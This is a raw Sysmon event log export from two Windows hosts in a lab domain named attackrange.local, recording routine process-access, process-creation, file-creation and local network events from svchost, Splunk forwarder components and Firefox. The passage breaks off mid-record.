08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083650Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083649Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083648Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083647Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083646Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083645Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083644Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083643Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083642Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B532-615A-9C01-00000000FD01}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083641Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B532-615A-9C01-00000000FD01}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083640Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.871{2FDD8D40-B532-615A-9C01-00000000FD01}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083639Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.339{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9559B79B1561C6AE50A40D242C257B,SHA256=7C027829B92DE51138CBB2BC8FEBA7F365A2B1281BDA02EC60C6A01C341D9E40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107739Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:57.271{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51930-false10.0.1.12-8089- 10341000x8000000000000000107738Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.610{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B532-615A-6202-00000000FC01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107737Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.610{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107736Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.610{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107735Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.610{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107734Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.610{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107733Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.610{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B532-615A-6202-00000000FC01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107732Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.610{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B532-615A-6202-00000000FC01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107731Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.611{58E9C193-B532-615A-6202-00000000FC01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107760Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.978{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107759Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.909{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B99693B4E8359B72D5B3EB45FB72955D,SHA256=FD81A238A261006B9FF559D798D4ED44F8FD856ADE71876F5FFB70B981FEE46C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083653Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:59.480{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6815BDCE9C5D9A0C2762C6C03BE28B8D,SHA256=7E93A926E1806B1AE1F89AD1CA40B5FA89DEB0DFEB198E8D4BA9D81548EF35FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107758Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.323{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51931-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000107757Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.323{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51931-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 10341000x8000000000000000107756Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.478{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107755Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.478{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107754Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.478{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla 